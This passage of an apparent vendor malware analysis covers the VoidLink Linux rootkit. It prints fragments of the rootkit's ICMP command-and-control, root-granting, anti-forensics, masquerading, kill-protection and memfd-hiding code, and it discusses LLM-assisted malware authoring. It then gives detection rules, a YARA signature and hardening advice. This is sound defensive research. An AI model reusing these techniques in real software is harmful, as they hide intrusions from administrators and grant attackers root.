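<p>For illustration, the 64-byte <code>icmp_cmd</code> structure and its XOR encoding can be modeled in a few lines of Python. The helper names below are ours, but the layout (<code>cmd</code>, <code>len</code>, 62-byte payload) and the default key <code>0x42</code> come from the source:</p>

```python
import struct

ICMP_KEY = 0x42       # default XOR key from the source
CMD_GIVE_ROOT = 0x11  # command byte documented in the analysis

def build_icmp_cmd(cmd, data, key=ICMP_KEY):
    """Pack the 64-byte icmp_cmd struct: cmd(1) + len(1) + data(62)."""
    if len(data) > 62:
        raise ValueError("payload exceeds 62 bytes")
    enc = bytes(b ^ key for b in data)
    return struct.pack("=BB62s", cmd, len(data), enc)

def parse_icmp_cmd(blob, key=ICMP_KEY):
    cmd, length, enc = struct.unpack("=BB62s", blob)
    return cmd, bytes(b ^ key for b in enc[:length])

# A GIVE_ROOT command targeting PID 1234 (4-byte little-endian PID argument)
pkt = build_icmp_cmd(CMD_GIVE_ROOT, struct.pack("=I", 1234))
assert len(pkt) == 64

cmd, data = parse_icmp_cmd(pkt)
assert cmd == CMD_GIVE_ROOT
assert struct.unpack("=I", data)[0] == 1234
```

In the real protocol this structure rides in the payload of an ICMP Echo Request whose <code>echo.id</code> carries the magic value.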
<p>The command set evolved across generations. The production variant (v5) supports 10 distinct commands, ranging from hiding processes and ports to privilege escalation and self-destruction. The <code>GIVE_ROOT</code> command (<code>0x11</code>) is noteworthy: It takes a target PID as an argument and uses <code>prepare_creds()</code>/<code>commit_creds()</code> to set all UID and GID fields to zero for that process, effectively granting it root privileges without any authentication mechanism:</p>
<pre><code class="language-c">case ICMP_CMD_GIVE_ROOT:
    if (cmd-&gt;len &gt;= 4) {
        u32 target_pid;
        memcpy(&amp;target_pid, cmd-&gt;data, 4);
        give_root_to_pid(target_pid);
    }
    break;
</code></pre>
<p>The operator interacts with the rootkit through a Python script, <code>icmp_ctl.py</code>, which constructs and sends the ICMP packets using raw sockets. The v5 version of this script provides a clean command line interface (CLI):</p>
<pre><code class="language-shell">./icmp_ctl.py 192.168.1.100 hide_pid 1234
./icmp_ctl.py 192.168.1.100 hide_port 8080
./icmp_ctl.py 192.168.1.100 hide_ip 10.0.0.50
./icmp_ctl.py 192.168.1.100 root 5678
./icmp_ctl.py 192.168.1.100 destruct
</code></pre>
<p>One aspect that distinguishes VoidLink's C2 from simpler rootkit implementations is runtime key rotation. The <code>SET_KEY</code> command (<code>0x20</code>) allows the operator to change both the ICMP magic identifier and the XOR key at runtime:</p>
<pre><code class="language-c">case ICMP_CMD_SET_KEY:
    if (cmd-&gt;len &gt;= 3) {
        u16 new_magic;
        u8 new_key;
        memcpy(&amp;new_magic, cmd-&gt;data, 2);
        new_key = cmd-&gt;data[2];
        g_config.icmp_magic = new_magic;
        g_config.icmp_key = new_key;
    }
    break;
</code></pre>
<p>After rotation, all subsequent commands must use the new magic and key values. This means that even if a defender discovers the initial <code>0xC0DE</code> signature through network monitoring, the operator can switch to a new value and continue operating. The v2 version of <code>icmp_ctl.py</code> even includes a probe mode that iterates through a list of common magic values (<code>0xC0DE</code>, <code>0xDEAD</code>, <code>0xBEEF</code>, <code>0xCAFE</code>, <code>0xFACE</code>), sending a <code>SHOW_MOD</code> command with each one to rediscover a rootkit whose credentials were rotated by a previous operator.</p>
<p>The CentOS 7 variant additionally supports compile-time magic randomization through a <code>CONFIG_RANDOM_MAGIC</code> flag, which generates unique magic and key values at build time using the kernel's random number generator. This would give each deployed instance a unique C2 signature, further complicating network-based detection.</p>
<p>From a detection perspective, the ICMP channel has one significant weakness: all command packets are silently dropped (<code>NF_DROP</code>), meaning that legitimate ICMP Echo Requests to the host will receive replies, while rootkit commands will not. A network monitoring system that correlates ICMP Echo Requests with their corresponding Echo Replies would notice the anomaly of unanswered pings.</p>
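<p>A minimal sketch of that correlation logic, using hypothetical event tuples rather than a real packet capture, illustrates the idea: any Echo Request <code>(id, seq)</code> pair that never receives a matching Echo Reply is flagged:</p>

```python
ECHO_REQUEST, ECHO_REPLY = 8, 0  # ICMP type values

def unanswered_pings(events):
    """events: iterable of (icmp_type, ident, seq) tuples from a capture.
    Returns the (ident, seq) pairs of Echo Requests that never received
    a matching Echo Reply."""
    requests, replies = set(), set()
    for icmp_type, ident, seq in events:
        if icmp_type == ECHO_REQUEST:
            requests.add((ident, seq))
        elif icmp_type == ECHO_REPLY:
            replies.add((ident, seq))
    return requests - replies

events = [
    (ECHO_REQUEST, 0x1234, 1), (ECHO_REPLY, 0x1234, 1),  # normal ping: answered
    (ECHO_REQUEST, 0xC0DE, 1),                           # rootkit command: dropped
]
assert unanswered_pings(events) == {(0xC0DE, 1)}
```

A production version would also tolerate legitimate packet loss, for example by alerting only on repeated unanswered requests from the same source.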
<h2>Advanced evasion techniques</h2>
<p>Beyond its core hiding capabilities, VoidLink employs several advanced evasion techniques that suggest awareness of modern endpoint detection and response (EDR) behavior and forensic investigation methods. These features are concentrated in the latest &quot;Ultimate Stealth v5&quot; variant (<code>stealth_v5.c</code>), but some appear across all generations.</p>
<h3>Delayed initialization</h3>
<p>Most rootkits install their hooks immediately during <code>module_init()</code>. This means that any security tool that monitors module loads, whether it checks for new kprobes, ftrace hooks, or syscall table modifications, can detect the rootkit at the time of insertion. VoidLink's v5 variant counters this by deferring all hook installation by three seconds:</p>
<pre><code class="language-c">static int __init mod_init(void)
{
    if (init_symbols() != 0)
        return -EFAULT;
    schedule_delayed_work(&amp;init_work, msecs_to_jiffies(3000));
    return 0;
}
</code></pre>
<p>The <code>mod_init()</code> function resolves a single symbol (<code>kallsyms_lookup_name</code> via the kprobe trick) and then returns success. The module appears loaded and benign, with no hooks, no Netfilter registrations, and no kretprobes. Three seconds later, <code>delayed_init()</code> fires, installing all nine ftrace hooks, registering the Netfilter ICMP handler, starting the anti-debugging timer, and removing the module from the kernel's module list.</p>
<p>This technique evades security tools that scan for suspicious module behavior in response to module-loading events. By the time the hooks are active, the initial security scan has already completed and may have marked the module as clean. The three-second delay is short enough to be operationally invisible but long enough to outlast any reasonable synchronous security check.</p>
<h3>Anti-debugging and anti-forensics</h3>
<p>VoidLink implements an active anti-forensics capability that is uncommon among Linux rootkits. While Windows malware frequently checks for debugging tools, Linux rootkits rarely implement runtime detection of forensic utilities. VoidLink's approach uses a kernel timer that fires every five seconds and iterates over the entire process list:</p>
<pre><code class="language-c">static const char *debug_tools[] = {
    &quot;strace&quot;, &quot;ltrace&quot;, &quot;gdb&quot;, &quot;perf&quot;, &quot;bpftool&quot;,
    &quot;bpftrace&quot;, &quot;systemtap&quot;, &quot;crash&quot;, &quot;kdb&quot;, &quot;trace-cmd&quot;,
    &quot;ftrace&quot;, &quot;sysdig&quot;, &quot;dtrace&quot;, NULL
};

static void anti_debug_scan(struct timer_list *t)
{
    struct task_struct *task;
    bool detected = false;

    rcu_read_lock();
    for_each_process(task) {
        if (is_debug_tool(task-&gt;comm)) {
            detected = true;
            break;
        }
    }
    rcu_read_unlock();

    if (detected &amp;&amp; !g_data.debug_detected) {
        g_data.debug_detected = true;
    } else if (!detected &amp;&amp; g_data.debug_detected) {
        g_data.debug_detected = false;
    }

    mod_timer(&amp;anti_debug_timer,
              jiffies + msecs_to_jiffies(ANTI_DEBUG_INTERVAL));
}
</code></pre>
<p>The tool list is comprehensive: It covers standard debugging tools (<code>strace</code>, <code>gdb</code>, <code>ltrace</code>), performance analysis utilities (<code>perf</code>, <code>trace-cmd</code>, <code>sysdig</code>), eBPF inspection tools (<code>bpftool</code>, <code>bpftrace</code>), and rootkit detection utilities (<code>rkhunter</code>, <code>chkrootkit</code> in the CentOS 7 variant). The scan uses <code>for_each_process()</code> under read-copy-update (RCU) lock protection, checking each task's <code>comm</code> field against the tool list. When a debugging tool is detected, the <code>debug_detected</code> flag is set. The CentOS 7 variant goes further: It can optionally pause all hiding operations or trigger self-destruction when forensic tools are detected.</p>
<h3>Module masquerading</h3>
<p>Every VoidLink variant disguises its kernel module metadata to impersonate a legitimate AMD driver:</p>
<pre><code class="language-c">MODULE_LICENSE(&quot;GPL&quot;);
MODULE_AUTHOR(&quot;Advanced Micro Devices, Inc.&quot;);
MODULE_DESCRIPTION(&quot;AMD Memory Encryption Support&quot;);
MODULE_VERSION(&quot;3.0&quot;);
</code></pre>
<p>The real <code>amd_mem_encrypt</code> module is a legitimate part of <a href="https://www.amd.com/en/developer/sev.html">AMD's Secure Memory Encryption (SME) and Secure Encrypted Virtualization (SEV)</a> support in the Linux kernel. By copying its metadata, VoidLink makes its <code>modinfo</code> output indistinguishable from the real driver. This disguise is particularly effective on cloud instances and virtual machines, where AMD-related kernel modules are commonly present and rarely questioned.</p>
<p>The v5 variant takes this further by XOR-encrypting the module name string and decoding it at runtime:</p>
<pre><code class="language-c">static char obf_modname[] = {
    'a'^ICMP_KEY, 'm'^ICMP_KEY, 'd'^ICMP_KEY, '_'^ICMP_KEY,
    'm'^ICMP_KEY, 'e'^ICMP_KEY, 'm'^ICMP_KEY, '_'^ICMP_KEY,
    'e'^ICMP_KEY, 'n'^ICMP_KEY, 'c'^ICMP_KEY, 'r'^ICMP_KEY,
    'y'^ICMP_KEY, 'p'^ICMP_KEY, 't'^ICMP_KEY, 0
};

static void decrypt_string(char *dst, const char *src, u8 key)
{
    while (*src) { *dst++ = *src++ ^ key; }
    *dst = 0;
}
</code></pre>
<p>This prevents simple string scanning of the compiled <code>.ko</code> binary from revealing the disguise name. While the XOR key (<code>0x42</code>) is trivially discoverable, the obfuscation adds a layer that defeats basic <code>strings</code> or <code>grep</code> analysis.</p>
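<p>The obfuscation and its weakness are easy to demonstrate outside the kernel. This Python sketch (ours) applies the same single-byte XOR to the module name and shows that the operation is its own inverse:</p>

```python
KEY = 0x42  # default key, shared with the ICMP channel

def xor_bytes(data, key=KEY):
    """Single-byte XOR; applying it twice restores the original."""
    return bytes(b ^ key for b in data)

obfuscated = xor_bytes(b"amd_mem_encrypt")   # what ends up in the .ko image
assert b"amd_mem_encrypt" not in obfuscated  # defeats naive strings/grep
assert xor_bytes(obfuscated) == b"amd_mem_encrypt"  # trivially reversed
```

An analyst who suspects single-byte XOR can brute-force all 256 keys in milliseconds, which is why this layer only stops casual inspection.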
<h3>Process protection</h3>
<p>The v5 variant introduces kill protection for designated processes. By hooking <code>do_send_sig_info</code> via ftrace, the rootkit intercepts all signal deliveries and silently discards lethal signals sent to protected PIDs:</p>
<pre><code class="language-c">if (chk_protected(p-&gt;pid)) {
    if (sig == SIGKILL || sig == SIGTERM || sig == SIGSTOP ||
        sig == SIGINT || sig == SIGHUP || sig == SIGQUIT) {
        return 0;  // Pretend success but don't deliver
    }
}
</code></pre>
<p>The intercepted signals include <code>SIGKILL</code>, <code>SIGTERM</code>, <code>SIGSTOP</code>, <code>SIGINT</code>, <code>SIGHUP</code>, and <code>SIGQUIT</code>, covering all common methods an administrator might use to terminate or suspend a process. The hook returns zero (success) to the caller, making the caller believe that the signal was delivered, when it was actually discarded. Additionally, signals sent to hidden (but not specifically protected) processes return <code>-ESRCH</code> (&quot;No such process&quot;), maintaining the illusion that the process doesn’t exist.</p>
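<p>The hook's decision logic can be modeled as a small pure function. The sketch below is our reconstruction, not the rootkit's code; it captures the three outcomes described above (fake success for protected PIDs, <code>-ESRCH</code> for hidden PIDs, and normal delivery otherwise):</p>

```python
ESRCH = 3  # errno for "No such process"
LETHAL = {"SIGKILL", "SIGTERM", "SIGSTOP", "SIGINT", "SIGHUP", "SIGQUIT"}

def hooked_send_sig(sig, pid, protected_pids, hidden_pids):
    """Reconstruction of the hooked do_send_sig_info() decision path."""
    if pid in protected_pids and sig in LETHAL:
        return 0           # fake success: signal silently discarded
    if pid in hidden_pids:
        return -ESRCH      # pretend the process does not exist
    return "delivered"     # fall through to the real implementation

assert hooked_send_sig("SIGKILL", 100, {100}, set()) == 0
assert hooked_send_sig("SIGUSR1", 100, {100}, set()) == "delivered"
assert hooked_send_sig("SIGTERM", 200, set(), {200}) == -3
```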
<h3>The memfd-aware boot loader</h3>
<p>The <code>load_lkm.sh</code> script reveals that VoidLink is designed to operate as part of a larger attack toolkit. Before loading the rootkit, the script scans <code>/proc/*/exe</code> for any process running from a <code>memfd</code> file descriptor:</p>
<pre><code class="language-shell">for pid in $(ls /proc 2&gt;/dev/null | grep -E &quot;^[0-9]+$&quot;); do
    exe=$(readlink /proc/$pid/exe 2&gt;/dev/null)
    if [[ &quot;$exe&quot; == *&quot;memfd&quot;* ]]; then
        IMPLANT_PIDS=&quot;$IMPLANT_PIDS $pid&quot;
    fi
done
</code></pre>
<p>A <code>memfd</code> file descriptor, created by <code>memfd_create()</code>, represents an anonymous in-memory file with no on-disk backing. Processes running from <code>memfd</code> are a strong indicator of <em>fileless implants</em>: that is, malware that exists only in memory and leaves no file on the filesystem. The boot script automatically passes any discovered <code>memfd</code> process PIDs to the rootkit as <code>init_pids</code>, ensuring that they’re hidden immediately upon rootkit activation.</p>
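<p>The filtering step itself is straightforward to model. The sketch below (ours) applies the same substring test to a hypothetical map of PIDs to resolved <code>/proc/&lt;pid&gt;/exe</code> targets; on Linux, <code>readlink</code> on a memfd-backed process yields a target of the form <code>/memfd:name (deleted)</code>:</p>

```python
def memfd_pids(exe_links):
    """exe_links: mapping of PID -> resolved /proc/<pid>/exe target.
    Returns the PIDs whose executable lives in an anonymous memfd."""
    return sorted(pid for pid, target in exe_links.items() if "memfd" in target)

links = {
    1: "/usr/lib/systemd/systemd",
    812: "/usr/sbin/sshd",
    4711: "/memfd:payload (deleted)",  # hypothetical fileless implant
}
assert memfd_pids(links) == [4711]
```

The same test that lets the loader find its companion implant also works for defenders: a <code>memfd</code>-backed executable on a server is worth investigating regardless of VoidLink.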
<p>This integration tells us that VoidLink isn’t a stand-alone tool. It’s designed to complement a separate fileless implant, likely a reverse shell or beacon, that the operator deploys first. The rootkit's job is to make that implant invisible to administrators and security tools.</p>
<h2>Evidence of LLM-assisted development</h2>
<p>Check Point Research's <a href="https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/">second publication on VoidLink</a> established that the broader framework was built using AI-driven development through the TRAE IDE, with sprint-planning documents, coding guidelines, and structured specifications all generated by an LLM. The rootkit source code in our data dump independently corroborates this finding and provides additional granular evidence at the code level. While the rootkit's technical sophistication is genuine, the patterns in its source code, comments, and development history offer a ground-level view of how LLM-assisted iteration produced kernel-level malware.</p>
<p>The most compelling evidence comes from the phase-numbered refactoring annotations in the CentOS 7 variant. The file header contains a structured changelog that reads like a series of LLM conversation turns: &quot;Fix the security issues&quot; (Phase 1), &quot;Now improve stealth&quot; (Phase 2), &quot;Add compatibility&quot; (Phase 3), &quot;Improve stability&quot; (Phase 4), &quot;Add defense mechanisms&quot; (Phase 5). Individual code changes are tagged throughout with identifiers like <code>[1.1]</code> for the first fix in Phase 1, <code>[2.3]</code> for the third fix in Phase 2, and so on. This systematic tagging matches the pattern of iterative LLM prompting, where a user requests a category of improvements and the model implements and numbers each one.</p>
<p>The comment style throughout VoidLink is tutorial-like in a way that experienced kernel developers wouldn’t produce. Consider this annotation on a single XOR decryption loop:</p>
<pre><code class="language-c">// XOR decryption
for (i = 0; i &lt; cmd-&gt;len; i++)
    cmd-&gt;data[i] ^= g_config.icmp_key;
</code></pre>
<p>An experienced kernel developer wouldn’t annotate a three-line XOR loop with a comment explaining that it performs XOR decryption. This kind of pedagogical annotation is characteristic of LLM output, where the model explains every step for the user's benefit, regardless of its obviousness.</p>
<p>Every source file in the dump uses the same Unicode box-drawing header (<code>═══</code>) to separate sections. This decorative formatting is a hallmark of LLM-generated code. Human kernel developers almost universally use simple <code>/* */</code> or <code>//</code> comment blocks for section headers. The consistency of this formatting across files written at different times and for different kernel versions suggests that each file was generated or heavily modified by the same LLM.</p>
<p>The <code>ebpf_test/</code> directory provides perhaps the most vivid evidence. It contains <code>hide_ss.bpf.c</code> through <code>hide_ss_v9.bpf.c</code>, with matching <code>loader.c</code> through <code>loader_v9.c</code>. Each version makes incremental improvements over the last, and several contain commented-out &quot;approach&quot; annotations that read like chain-of-thought reasoning:</p>
<pre><code class="language-c">// Approach tried: don't modify return value, only record
// Approach 2: return -ENOMEM to make caller skip
if (data-&gt;should_hide &amp;&amp; regs-&gt;ax == 0) {
    // Try: return -EAGAIN, make caller think temporary error, skip entry
    regs-&gt;ax = (unsigned long)(-EAGAIN);
}
</code></pre>
<p>These &quot;Approach 1 / Approach 2 / try this&quot; annotations look like LLM reasoning traces left in the output, where the model discusses different strategies before implementing one.</p>
<p>Despite the strong LLM fingerprints, VoidLink is clearly not a pure LLM creation. Several pieces of evidence confirm human involvement in the development process. The <code>icmp_ctl.py</code> usage examples contain real Alibaba Cloud IP addresses (<code>8.149.128[.]10</code>, <code>116.62.172[.]147</code>), indicating operational use on actual targets. Compiled <code>.ko</code> files are available for specific kernel versions, demonstrating that the code was tested on real systems. The <code>load_lkm.sh</code> boot script, with its <code>memfd</code> scanning logic, reveals integration with a broader attack toolkit that a pure LLM session wouldn’t produce. And the 10 iterative eBPF versions in <code>ebpf_test/</code> show genuine debugging and testing cycles, not just prompt engineering.</p>
<p>These code-level observations align with Check Point's macro-level findings. Where Check Point recovered the sprint planning documents and TRAE IDE artifacts showing a specification-driven development workflow, our data dump reveals the other side of the same coin: the iterative prompt-test-refine cycles that produced each rootkit component. The most likely development model was a human-LLM collaboration: The operator defined requirements and tested on real systems, while the LLM generated initial implementations and iterated on fixes in response to error reports. This development pattern is significant because it lowers the barrier to entry for kernel-level rootkit development. An operator who understands the concepts but lacks the kernel programming expertise to implement them from scratch can now produce functional, multigeneration rootkits by iterating with an LLM.</p>
<h2>Detecting VoidLink’s rootkits</h2>
<p>Despite VoidLink's multilayered evasion capabilities, several detection strategies are available. The rootkit's thoroughness creates opportunities: Each component (the LKM, the eBPF program, the ICMP channel, and the boot loader) leaves distinct artifacts that defenders can monitor. Because the rootkit actively filters files such as <code>/proc/kallsyms</code>, <code>/proc/modules</code>, and <code>/sys/kernel/debug/kprobes/list</code>, some of the detection strategies below should be validated in a trusted environment, such as a live boot medium or a kernel with verified integrity.</p>
<h3>Module integrity detection</h3>
<p>VoidLink removes itself from the kernel's module linked list (<code>list_del_init</code>), making it invisible to <code>lsmod</code> and <code>/proc/modules</code>. However, the module's sysfs entries under <code>/sys/module/</code> may persist, depending on the variant. Comparing the output of <code>lsmod</code> against <code>ls /sys/module/</code> can reveal discrepancies. Additionally, the absence of <code>amd_mem_encrypt</code> on systems without AMD hardware or without SME/SEV support is a strong indicator.</p>
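<p>The comparison can be scripted as a simple set difference. This Python sketch (ours) flags modules present in sysfs but absent from <code>lsmod</code> output; in practice, <code>/sys/module/</code> also lists built-in modules and parameter-only entries, so known-good names should be filtered before alerting:</p>

```python
def hidden_module_candidates(lsmod_names, sysfs_names, known_builtin=()):
    """Modules visible under /sys/module/ but absent from lsmod output are
    candidates for a module unlinked via list_del_init()."""
    return sorted(set(sysfs_names) - set(lsmod_names) - set(known_builtin))

lsmod_out = ["ext4", "xfs", "e1000"]
sysfs_out = ["ext4", "xfs", "e1000", "printk", "amd_mem_encrypt"]
assert hidden_module_candidates(lsmod_out, sysfs_out,
                                known_builtin=["printk"]) == ["amd_mem_encrypt"]
```

Because VoidLink's <code>vfs_read</code> hook can filter <code>/proc/modules</code>, collecting the <code>lsmod</code> side of this comparison from a trusted kernel (or remotely via an agent that predates infection) gives more reliable results.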
<p>The following Event Query Language (EQL) query detects kernel module loading events using the default installed utilities:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    process.name == &quot;kmod&quot; and
    process.args == &quot;insmod&quot; and
    process.args like~ &quot;*.ko*&quot;
  ) or
  (
    process.name == &quot;kmod&quot; and
    process.args == &quot;modprobe&quot; and
    not process.args in (&quot;-r&quot;, &quot;--remove&quot;)
   ) or
  (
    process.name == &quot;insmod&quot; and
    process.args like~ &quot;*.ko*&quot;
   ) or
  (
    process.name == &quot;modprobe&quot; and
    not process.args in (&quot;-r&quot;, &quot;--remove&quot;)
  )
)
</code></pre>
<p>The loading of the kernel module is detectable through Auditd Manager by applying the following configuration:</p>
<pre><code class="language-sql">-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules
-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules
</code></pre>
<p>And using the following query:</p>
<pre><code class="language-sql">driver where host.os.type == &quot;linux&quot; 
and event.action == &quot;loaded-kernel-module&quot; 
and auditd.data.syscall in (&quot;init_module&quot;, &quot;finit_module&quot;)
</code></pre>
<h3>Ftrace hook detection</h3>
<p>VoidLink's ftrace hooks can be discovered by inspecting the kernel's tracing infrastructure. The file <code>/sys/kernel/debug/tracing/enabled_functions</code> lists all active ftrace hooks. Unexpected hooks on functions like <code>__x64_sys_getdents64</code>, <code>vfs_read</code>, <code>do_send_sig_info</code>, or <code>__x64_sys_statx</code> are highly suspicious. Note that VoidLink's <code>vfs_read</code> hook filters this file, so inspection from a trusted kernel is recommended.</p>
<h3>eBPF program detection</h3>
<p>The eBPF companion can be detected through <code>bpftool prog list</code>, which enumerates all loaded BPF programs. Kprobe and kretprobe programs attached to <code>__sys_recvmsg</code> are unusual in production environments and warrant investigation. Pinned BPF maps under <code>/sys/fs/bpf/</code> (used by the <code>ebpf_hide</code> variant) are another indicator.</p>
<p>The <code>bpf_probe_write_user</code> helper facilitates direct writes from kernel-space eBPF programs into userland memory. Although designed for debugging, rootkits can exploit this functionality. Consequently, monitoring for instances of this helper's use presents a detection opportunity. This detection requires the collection of raw syslog data and the implementation of specific detection rules, as outlined below:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;bpf_probe_write_user&quot;
</code></pre>
<h3>Behavioral cross-referencing</h3>
<p>One of the most effective detection strategies doesn’t rely on inspecting the rootkit's artifacts directly but instead cross-references different views of the system for inconsistencies. Compare the output of <code>ps aux</code> against a raw listing of <code>/proc/</code> directory entries. Compare <code>netstat -tlnp</code> against <code>ss -tlnp</code> against a direct read of <code>/proc/net/tcp</code>. If VoidLink's eBPF component isn’t loaded (or if the LKM and eBPF hide lists are out of sync), connections visible in one view but not another indicate rootkit activity.</p>
<p>A simple (generated) comparison script can automate this:</p>
<pre><code class="language-shell">#!/bin/bash
# Behavioral cross-referencing: detect hidden processes and network connections
# by comparing multiple views of the same system state.

set -euo pipefail

echo &quot;=== Process cross-reference ===&quot;
ps_count=$(ps aux --no-headers | wc -l)
proc_count=$(ls -d /proc/[0-9]* 2&gt;/dev/null | wc -l)
echo &quot;ps reports $ps_count processes, /proc has $proc_count entries&quot;

if [ &quot;$ps_count&quot; -ne &quot;$proc_count&quot; ]; then
    echo &quot;[!] MISMATCH — possible hidden or spoofed processes&quot;
    ps aux --no-headers | awk '{print $2}' | sort -n &gt; /tmp/.ps_pids
    ls -d /proc/[0-9]* 2&gt;/dev/null | xargs -n1 basename | sort -n &gt; /tmp/.proc_pids
    diff /tmp/.ps_pids /tmp/.proc_pids || true
    rm -f /tmp/.ps_pids /tmp/.proc_pids
else
    echo &quot;[OK] Process counts match&quot;
fi

echo &quot;&quot;
echo &quot;=== Network cross-reference ===&quot;

# Method 1: ss (iproute2 — always available on modern Linux)
# -t = TCP, -l = listening, -n = numeric, no -p (needs root)
ss_port_nums=$(ss -tln | awk 'NR&gt;1{print $4}' | grep -oP '\d+$' | sort -un || true)

# Method 2: Parse /proc/net/tcp directly (kernel-level view)
# Filter for state 0A (LISTEN), extract hex port, convert via shell printf
proc_ports=$(
    awk 'NR&gt;1 &amp;&amp; $4 == &quot;0A&quot; {split($2, a, &quot;:&quot;); print a[2]}' \
        /proc/net/tcp /proc/net/tcp6 2&gt;/dev/null \
    | while read -r hex; do printf &quot;%d\n&quot; &quot;0x$hex&quot;; done \
    | sort -un
)

echo &quot;ss listening ports      : $(echo &quot;$ss_port_nums&quot; | tr '\n' ' ')&quot;
echo &quot;/proc/net/tcp listening : $(echo &quot;$proc_ports&quot; | tr '\n' ' ')&quot;

diff_result=$(diff &lt;(echo &quot;$ss_port_nums&quot;) &lt;(echo &quot;$proc_ports&quot;) || true)
if [ -z &quot;$diff_result&quot; ]; then
    echo &quot;[OK] Network views match&quot;
else
    echo &quot;[!] MISMATCH — possible hidden connections:&quot;
    echo &quot;$diff_result&quot;
fi
</code></pre>
<h3>YARA signature</h3>
<p>Based on our analysis, we developed the following YARA signature to detect VoidLink's compiled kernel modules and related artifacts:</p>
<pre><code>rule Linux_Rootkit_VoidLink {
    meta:
        author = &quot;Elastic Security&quot;
        creation_date = &quot;2026-03-12&quot;
        last_modified = &quot;2026-03-12&quot;
        os = &quot;Linux&quot;
        arch = &quot;x86_64&quot;
        threat_name = &quot;Linux.Rootkit.VoidLink&quot;
        description = &quot;Detects VoidLink LKM rootkit variants&quot;

    strings:
        $mod1 = &quot;AMD Memory Encryption Support&quot;
        $mod2 = &quot;AMD Memory Encryption Driver&quot;
        $mod3 = &quot;Advanced Micro Devices, Inc.&quot;
        $func1 = &quot;vl_stealth&quot;
        $func2 = &quot;g_data&quot;
        $func3 = &quot;icmp_cmd&quot;
        $func4 = &quot;chk_pid&quot;
        $func5 = &quot;chk_port&quot;
        $func6 = &quot;mod_hide&quot;
        $func7 = &quot;amd_mem_encrypt&quot;
        $ebpf1 = &quot;hidden_ports&quot;
        $ebpf2 = &quot;recvmsg_ctx&quot;
        $ebpf3 = &quot;SOCK_DIAG_BY_FAMILY&quot;

    condition:
        (2 of ($mod*) and 3 of ($func*)) or
        (1 of ($mod*) and 2 of ($ebpf*)) or
        (4 of ($func*))
}
</code></pre>
<h3>Defensive recommendations</h3>
<p>Defending against rootkits like VoidLink requires a multilayered approach that goes beyond traditional endpoint protection. Secure Boot and kernel module signing should be enforced to prevent unauthorized kernel modules from loading. The kernel lockdown mode, available since Linux 5.4, restricts operations such as direct memory access and unsigned module loading, even for root users. Monitor the Auditd subsystem for <code>init_module</code> and <code>finit_module</code> syscalls, as any unexpected kernel module load on a production server warrants immediate investigation.</p>
<p>For eBPF specifically, consider restricting the <code>bpf()</code> syscall to specific processes using seccomp profiles or LSM policies. The <code>bpf_probe_write_user</code> helper, which VoidLink abuses to modify userspace memory from eBPF programs, is a known high-risk primitive. Systems that don’t require eBPF-based debugging should set <code>kernel.unprivileged_bpf_disabled=1</code> via sysctl; note that this blocks the <code>bpf()</code> syscall only for unprivileged users and doesn’t stop a root-level attacker from loading programs.</p>
<p>Regular integrity checks that cross-reference different system views (process listings, network connections, module lists) from userspace and from a trusted kernel can reveal rootkit activity even when individual views are compromised. Kernel memory forensics tools that can scan for known rootkit patterns, such as ftrace hooks on suspicious functions or Netfilter hooks processing ICMP traffic, provide another layer of defense.</p>
<h2>Observations</h2>
<p>The following observables were identified during this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>8.149.128[.]10</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">Operator IP (Alibaba Cloud)</td>
</tr>
<tr>
<td align="left"><code>116.62.172[.]147</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">Operator IP (Alibaba Cloud)</td>
</tr>
<tr>
<td align="left"><code>vl_stealth.ko</code></td>
<td align="left">filename</td>
<td align="left"><code>vl_stealth</code></td>
<td align="left">Production LKM rootkit module</td>
</tr>
<tr>
<td align="left"><code>amd_mem_encrypt.ko</code></td>
<td align="left">filename</td>
<td align="left"><code>amd_mem_encrypt</code></td>
<td align="left">Masqueraded LKM rootkit module</td>
</tr>
<tr>
<td align="left"><code>hide_ss.bpf.o</code></td>
<td align="left">filename</td>
<td align="left"><code>hide_ss</code></td>
<td align="left">eBPF ss-hiding component</td>
</tr>
<tr>
<td align="left"><code>ss_loader</code></td>
<td align="left">filename</td>
<td align="left"><code>ss_loader</code></td>
<td align="left">eBPF loader binary</td>
</tr>
<tr>
<td align="left"><code>icmp_ctl.py</code></td>
<td align="left">filename</td>
<td align="left"><code>icmp_ctl</code></td>
<td align="left">ICMP C2 control script</td>
</tr>
<tr>
<td align="left"><code>load_lkm.sh</code></td>
<td align="left">filename</td>
<td align="left"><code>load_lkm</code></td>
<td align="left">Boot-time persistence loader</td>
</tr>
<tr>
<td align="left"><code>/root/kernel5x_new/vl_stealth.ko</code></td>
<td align="left">filepath</td>
<td align="left"></td>
<td align="left">Hard-coded module path</td>
</tr>
<tr>
<td align="left"><code>/var/log/vl_boot.log</code></td>
<td align="left">filepath</td>
<td align="left"></td>
<td align="left">Boot loader log file</td>
</tr>
<tr>
<td align="left"><code>/sys/fs/bpf/vl_hide_tcp</code></td>
<td align="left">filepath</td>
<td align="left"></td>
<td align="left">Pinned BPF map (override variant)</td>
</tr>
<tr>
<td align="left"><code>0xC0DE</code></td>
<td align="left">icmp-magic</td>
<td align="left"></td>
<td align="left">Default ICMP identification value</td>
</tr>
<tr>
<td align="left"><code>0x42</code></td>
<td align="left">xor-key</td>
<td align="left"></td>
<td align="left">Default XOR encryption key</td>
</tr>
<tr>
<td align="left"><code>AMD Memory Encryption Support</code></td>
<td align="left">string</td>
<td align="left"></td>
<td align="left">Masqueraded MODULE_DESCRIPTION</td>
</tr>
<tr>
<td align="left"><code>Advanced Micro Devices, Inc.</code></td>
<td align="left">string</td>
<td align="left"></td>
<td align="left">Masqueraded MODULE_AUTHOR</td>
</tr>
<tr>
<td align="left"><code>8080</code></td>
<td align="left">network-port</td>
<td align="left"></td>
<td align="left">Default hidden port</td>
</tr>
</tbody>
</table>
<h2>Conclusion</h2>
